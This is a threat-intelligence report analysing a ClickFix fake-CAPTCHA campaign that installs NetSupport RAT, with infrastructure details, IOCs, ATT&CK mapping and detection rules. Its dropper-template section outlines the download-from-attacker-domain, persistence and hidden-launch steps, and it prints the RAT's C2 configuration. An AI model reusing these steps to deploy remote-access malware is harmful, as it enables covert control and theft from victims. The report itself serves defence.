NetSupport RAT v14.10: ClickFix Campaign Deploys Commodity RAT via Fake CAPTCHA Pages
Two Windows Server 2022 nodes named 'SMTP' on the same /24 subnet in Frankfurt, victim tracking IDs, and a domain registered just 48 hours before go-live
Overview
On March 12, 2026, Breakglass Intelligence analyzed a NetSupport RAT v14.10 deployment campaign using the ClickFix (also known as FakeCaptcha) delivery technique. A malicious MSI installer or PowerShell script delivered through a fake CAPTCHA page downloads a pre-packaged NetSupport RAT ZIP from applicationhost17.com, extracts it to %APPDATA%, and establishes persistence via a Run registry key. The RAT then beacons to a Windows Server 2022 C2 node at 172.94.9.4:443 using the standard NetSupport HTTP protocol.
The infrastructure tells a story of deliberate operational planning: two Windows servers sharing the hostname "SMTP" on the same /24 subnet (172.94.9.0/24) hosted at M247 Frankfurt, domain registration through Njalla (a privacy-first registrar), and per-victim tracking IDs to monitor install status. The download payload later migrated to Russian hosting (landvps.ru), pointing to an actor with established OPSEC practices and infrastructure-rotation awareness.
At time of analysis, the C2 was actively responding with HTTP 200 to beacon requests. The sample had 30/76 VirusTotal detections.
Sample Metadata
| Field | Value |
|---|---|
| Filename | UPD-48C5A1C5-DDD4-465E-9C66-27EFC1D5A846.zip |
| SHA256 | 36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1 |
| MD5 | 8a14ae0c80b64114ad63a146e1b0871c |
| SHA1 | 0654b2098e8dd2c868d10ac6248fdf4cacebddd2 |
| File Type | ZIP archive |
| File Size | 2,243,453 bytes |
| VT Detections | 30/76 |
| First Seen | 2026-03-12 17:13:41 UTC |
| Reporter | JAMESWT_WT |
| Bundle Contents | 15 files (8 PE, 2 INI, 2 DLL, 1 LIC, 1 INF, 1 TXT) |
The ClickFix Delivery Technique
ClickFix, active since mid-2024, is a social engineering technique that presents a fake browser or CAPTCHA error instructing users to manually paste a command into Win+R (Run dialog) or the browser address bar. This campaign's specific flow:
- Victim visits a page at
https://applicationhost17.com/captcha.php?vid=<CAMPAIGN_ID> - The fake CAPTCHA instructs the user to execute a command
- A PowerShell dropper runs with
-NoProfile -ExecutionPolicy bypass - The dropper downloads the NetSupport RAT ZIP, extracts it, sets persistence, and launches the RAT
- Tracking callbacks to
track.phprecord when installation starts and completes
An MSI installer variant (5bfbe9.msi / bad.msi, SHA256: 78a511e1...) also exists, dropping PowerShell scripts to temp before fetching the main payload. The MSI publisher is left as "Your Company" -- a generic placeholder that reveals uncustomized tooling and a notable OPSEC failure.
The PowerShell Dropper Template
All observed PowerShell droppers follow an identical template with randomized variable names:
- Track start:
GET https://applicationhost17.com/track.php?vid=<VID>&action=started - Create install directory:
%APPDATA%\<GUID_DIR>\(e.g.,TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569) - Download RAT ZIP:
IWR https://applicationhost17.com/downloads/<UUID>.zip - Extract and clean up:
Expand-Archivethen delete ZIP - Set persistence:
HKCU\...\Run\SystemUpdate_<VID>pointing toclient32.exe - Launch RAT:
Start-Process -WindowStyle Hidden - Track completion:
GET https://applicationhost17.com/track.php?vid=<VID>&action=completed
Observed Campaign Variants
| VID | Installation Directory | Notes |
|---|---|---|
jOTlMUPQ | TM-EA9F5A76-* / MW-3BE3C31C-* | Two directories, same VID |
mMVTJvis | TM-07F72CBE-* | Separate tracking ID |
69b1c805806ef | SY-02B0EC74-* | Longer hex-like VID |
6566676869707172 | UPD-E9550778-* | Decodes to efghijpr -- sequential ASCII test values |
The last VID decoding to sequential ASCII characters strongly suggests the actor was testing the infrastructure with incremental values, and these test runs leaked into the wild.
NetSupport RAT: The Payload
client32.exe
| Field | Value |
|---|---|
| Version | V14.10 |
| Compiled | 2023-12-05 |
| Product | NetSupport Remote Control |
| Company | NetSupport Ltd |
| IMPHASH | a9d50692e95b79723f3e76fcf70d023e |
NetSupport Manager v14.10 is a legitimate remote administration tool being repurposed as an unauthorized RAT. The bundle includes:
- client32.exe: Main RAT client
- PCICL32.DLL: Primary networking DLL (3.7MB, 22/76 VT)
- remcmdstub.exe: Remote command execution / shell access
- nskbfltr.inf: Kernel keyboard filter for keylogging
- NSM.LIC: Forged license file (detected as
BackDoor.RMS.153by DrWeb) - HTCTL32.DLL: Audio/webcam capture capabilities
C2 Configuration (Client32.ini)
[CLIENT]
GatewayAddress=172.94.9.4
GSK=1 ; Gateway SecureKey enabled
PORT=443
[CONTROL]
SilentInstall=1
RAT Capabilities
Once installed, the operator has full control of the victim machine:
- Full desktop viewing and control
- Remote shell (cmd/PowerShell via
remcmdstub.exe) - File manager with upload/download
- Keyboard/mouse injection
- Keylogging (kernel filter driver)
- Screen capture and recording
- Audio and webcam capture
- Process management
C2 Infrastructure: The "SMTP" Twins
C2 Server: 172.94.9.4
| Field | Value |
|---|---|
| Hostname | SMTP (NetBIOS) |
| OS | Windows Server 2022 |
| ASN | AS9009 / AS213790 (M247 Europe SRL) |
| Location | Frankfurt am Main, Germany |
| Open Ports | 135 (MSRPC), 443 (C2), 445 (SMB v2), 5357 (HTTPAPI) |
| VT Malicious | 3/90 |
Port 443 runs plain HTTP tunneled over the port (not actual HTTPS) -- the NetSupport protocol uses HTTP POST to /fakeurl.htm with User-Agent NetSupport Manager/1.3. SMB and MSRPC being exposed indicates the attacker has not hardened the server.
Download/Tracking Server: 172.94.9.24
| Field | Value |
|---|---|
| Hostname | SMTP (same naming convention) |
| OS | Windows Server 2022 |
| ASN | AS9009 / AS213790 (same infrastructure) |
| Location | Frankfurt am Main, Germany |
| Open Ports | 3389 (RDP), 5357 (HTTPAPI) |
Port 3389 (RDP) with a valid TLS certificate CN=smtp is the attacker's management interface. Both servers share the same hostname "SMTP" and sit on the same /24 subnet -- a clear infrastructure reuse fingerprint.
Current Download Server: 77.105.133.95
| Field | Value |
|---|---|
| Hostnames | 163115.landvps.online, 152253.landvps.online |
| OS | Debian 11 |
| ASN | AS216334 (New Hosting Technologies LLC) |
| Location | Moscow, Russia |
| Server | Apache/2.4.66 |
The DNS for applicationhost17.com migrated from 172.94.9.24 to 77.105.133.95 between March 11 and March 12 -- the actor rotated the download server to Russian hosting while keeping the C2 node fixed in Frankfurt. The 600-second DNS TTL indicates active infrastructure management.
Download Domain: applicationhost17.com
| Field | Value |
|---|---|
| Registered | 2026-03-10T13:54:11Z (48 hours before campaign) |
| Registrar | Tucows (via Njalla privacy service) |
| Nameservers | 1-YOU.NJALLA.NO, 2-CAN.NJALLA.IN, 3-GET.NJALLA.FO |
| Registrant | Hashed/obfuscated (1f8f4166599d23ee) |
| Current A Record | 77.105.133.95 |
| Previous A Record | 172.94.9.24 (sandbox era) |
| VT Malicious | 11/94 |
| DNS TTL | 600 seconds |
The registrant fields contain truncated SHA256/HMAC hashes -- Njalla's standard obfuscation of real registrant data. No usable attribution from WHOIS.
C2 Communication Protocol
| URL | Method | User-Agent | Response |
|---|---|---|---|
http://172.94.9.4/fakeurl.htm | POST | NetSupport Manager/1.3 | 200 OK |
http://172.94.9.4:443/fakeurl.htm | POST | NetSupport Manager/1.3 | 200 OK |
http://geo.netsupportsoftware.com/location/loca.asp | GET | NetSupport default | 404 |
https://applicationhost17.com/track.php?vid=<VID>&action=started | GET | PowerShell UA | 500 |
https://applicationhost17.com/track.php?vid=<VID>&action=completed | GET | PowerShell UA | 500 |
The geolocation beacon to geo.netsupportsoftware.com is a legitimate NetSupport feature -- its presence confirms the client is genuine NetSupport Manager software repurposed as a RAT.
Campaign Timeline
| Date | Event |
|---|---|
| 2023-12-05 | client32.exe compilation date |
| 2026-03-07 22:38:12 | ZIP bundle files timestamp |
| 2026-03-10 13:54:11 | applicationhost17.com registered via Njalla |
| 2026-03-11 | MSI and PS1 droppers first observed in sandboxes |
| 2026-03-12 17:13:41 | Primary ZIP submitted to VT by JAMESWT_WT |
| 2026-03-12 | DNS updated: 172.94.9.24 migrated to 77.105.133.95 |
The tight timeline -- domain registration to active campaign in 48 hours -- indicates a rapid-deployment operational tempo. The bundle files were timestamped March 7, suggesting the actor prepared the payload 3 days before registering the delivery domain.
Attribution Assessment
Confidence: MEDIUM
The actor uses ClickFix delivery (widely adopted since 2024), deploys commodity NetSupport RAT (low barrier, widely available), registers through Njalla (privacy-first registrar popular with Russian-nexus actors), and hosts infrastructure on M247 (low-KYC hoster) and Russian landvps.ru. The machine naming convention "SMTP" suggests deliberate misdirection -- making the servers appear as mail infrastructure in network logs.
The per-victim VID tracking system suggests a commercial/MaaS operation rather than a lone actor.
OPSEC Failures
- MSI publisher "Your Company": Generic placeholder reveals uncustomized tooling
- Shared hostname and subnet: Both C2 servers named "SMTP" on the same /24 -- infrastructure fingerprint
- 48-hour domain staging: Minimal time between registration and campaign activation
- Test VID in the wild:
6566676869707172decoding to sequential ASCII suggests development/testing runs submitted to sandboxes - RDP exposed: Port 3389 open on the download server -- actor management interface visible to internet scanners
MITRE ATT&CK TTPs
| ID | Technique | Detail |
|---|---|---|
| T1566 | Phishing | ClickFix fake CAPTCHA lure |
| T1204.002 | User Execution: Malicious File | User executes MSI or pastes PowerShell |
| T1059.001 | PowerShell | Dropper with -ExecutionPolicy bypass |
| T1105 | Ingress Tool Transfer | ZIP downloaded via Invoke-WebRequest |
| T1547.001 | Registry Run Keys | HKCU\...\Run\SystemUpdate_<VID> |
| T1036 | Masquerading | "software.zip", GUID directory names |
| T1219 | Remote Access Software | NetSupport Manager v14.10 as unauthorized RAT |
| T1071.001 | Application Layer Protocol: Web | HTTP POST /fakeurl.htm |
| T1095 | Non-Application Layer Protocol | NetSupport binary protocol over TCP 443 |
| T1112 | Modify Registry | Sets Run key for persistence |
| T1113 | Screen Capture | NetSupport screen view capability |
| T1056.001 | Input Capture: Keylogging | nskbfltr.inf kernel keyboard filter |
| T1021.001 | Remote Services: RDP | Actor RDPs to 172.94.9.24 for management |
IOC Tables
File Hashes
| SHA256 | Name | Type |
|---|---|---|
36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1 | UPD-48C5A1C5-*.zip | Primary ZIP bundle |
78a511e1da802149564639d4c3b66f67faee4bb6d762ffae4325075709217275 | 5bfbe9.msi / bad.msi | MSI dropper |
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268 | client32.exe | NetSupport RAT v14.10 |
63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 | PCICL32.DLL | NetSupport networking DLL |
6558b3307215c4b73fc96dc552213427fb9b28c0cb282fe6c38324f1e68e87d6 | remcmdstub.exe | Remote shell stub |
ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 | NSM.LIC | Forged license file |
fcacfab09fe00dc26c86172fdc7482efb196e6cf725bef4d141d28dff4638619 | Client32.ini | C2 configuration |
d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 | nskbfltr.inf | Keyboard filter INF |
4343b537e338771434045022a4961a84ba42cdecd7e98f48087a4213d20b3f59 | dropper.ps1 (jOTlMUPQ) | PowerShell dropper |
876d5fdf5addc3f5e2987e841954248a4d15d9ecaca74ef317d76459f2cb3f13 | dropper.ps1 (jOTlMUPQ) | PowerShell dropper |
43ac17b48413c7c1545a8ce6f0b2219c3dd2a3289546c6886affbff9bfd15094 | dropper.ps1 (mMVTJvis) | PowerShell dropper |
e2edb63c46dd8cf41c541ae45accfce66e41dc4ddcbef61ee3ea9dc9d8d7a588 | dropper.ps1 (test VID) | PowerShell dropper |
Network Indicators
| Indicator | Type | Role |
|---|---|---|
172.94.9.4 | IPv4 | NetSupport C2 |
172.94.9.24 | IPv4 | Download server / RDP management |
77.105.133.95 | IPv4 | Current download/tracking server |
applicationhost17.com | Domain | Download + tracking panel |
http://172.94.9.4/fakeurl.htm | URL | NetSupport C2 beacon |
http://172.94.9.4:443/fakeurl.htm | URL | NetSupport C2 beacon (alt port) |
https://applicationhost17.com/captcha.php | URL | ClickFix lure / PS1 delivery |
https://applicationhost17.com/track.php | URL | Victim tracking |
https://applicationhost17.com/downloads/ | URL | RAT payload staging |
NetSupport Manager/1.3 | User-Agent | C2 traffic fingerprint |
Registry Indicators
| Key | Value | Purpose |
|---|---|---|
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID> | "%APPDATA%\<GUID>\client32.exe" | Persistence |
File System Indicators
| Path | Description |
|---|---|
%APPDATA%\TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569\ | RAT install dir |
%APPDATA%\TM-07F72CBE-931E-4389-BEC0-21326A8A70C4\ | RAT install dir |
%APPDATA%\MW-3BE3C31C-505C-43FD-9BBF-7E505ABA8D85\ | RAT install dir |
%APPDATA%\SY-02B0EC74-4AE2-4686-96D2-CD15498FCFDF\ | RAT install dir |
%APPDATA%\UPD-E9550778-2701-42F4-9FFD-36119FABE805\ | RAT install dir |
%APPDATA%\<GUID>\client32.exe | NetSupport RAT binary |
Detection Guidance
Behavioral Indicators
powershell.exewith-ExecutionPolicy bypassdownloading from newly registered domainsclient32.exerunning from%APPDATA%\<UUID>\(outside Program Files)- DNS query to
geo.netsupportsoftware.comfrom non-browser processes - HTTP POST to
/fakeurl.htmwith User-AgentNetSupport Manager/1.3 - Run key name with
SystemUpdate_prefix - MSI Publisher = "Your Company"
Network Signatures
- Block traffic to
172.94.9.4,172.94.9.24, and77.105.133.95 - Block DNS resolution of
applicationhost17.com - Alert on HTTP POST requests to
/fakeurl.htmfrom internal hosts - Alert on User-Agent string
NetSupport Manager/1.3from non-IT-approved systems
Analysis by GHOST -- Breakglass Intelligence